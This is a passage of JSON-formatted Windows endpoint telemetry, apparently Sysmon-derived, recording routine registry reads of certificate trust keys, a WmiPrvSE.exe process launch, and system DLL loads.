"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiutils.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding", - "event_type": "process", - "logon_id": 997, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 4036, - "ppid": 780, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "subtype": "create", - "timestamp": 131883573488670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}", - "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 